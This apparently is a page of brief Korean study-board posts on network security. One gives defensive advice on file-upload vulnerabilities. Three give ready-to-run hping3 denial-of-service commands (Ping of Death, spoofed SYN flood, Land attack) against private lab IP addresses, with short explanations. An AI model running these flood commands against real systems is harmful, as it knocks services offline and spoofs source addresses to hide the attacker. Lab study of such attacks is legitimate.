| | 파일업로드 취약점 방지 방법 2: 근본 대책
|
| 서버의 파일 업로드 스크립트 내에서 업로드 허용/불허 확장자 목록을 설정한다.
또는
업로드되는 파일의 이름과 확장자를 모두 없애고 새로운 이름으로 부여한다. |
| |
공개
| 댓글: 0 | 첨부파일: 0 |
등록자: jinsuk |
등록일:
|
| |
| | Ping of Death 공격법
|
| hping3 --icmp --rand-source 192.168.0.159 -d 65000 --flood
icmp로 공격자 IP 무작위 설정, 패킷길이 65kb, flooding으로 가능한 많이 보내기. |
| |
공개
| 댓글: 0 | 첨부파일: 0 |
등록자: jinsuk |
등록일:
|
| |
| | SYN Flooding 공격
|
| hping3 --rand-source 192.168.0.128 -p 80 -S --flood
공격자 IP를 무작위로 위장, 80 포트로 TCP SYN (-S옵션)을 가능한 많이. |
| |
공개
| 댓글: 0 | 첨부파일: 0 |
등록자: jinsuk |
등록일:
|
| |
| | Land공격
|
| hping3 192.168.0.111 -a 192.168.0.111 --icmp --flood
공격자 IP를 공격대상 IP로 변경하여 ICMP 패킷 홍수방출. 패킷꼬리물기... |
| |
공개
| 댓글: 0 | 첨부파일: 0 |
등록자: jinsuk |
등록일:
|
| |
|
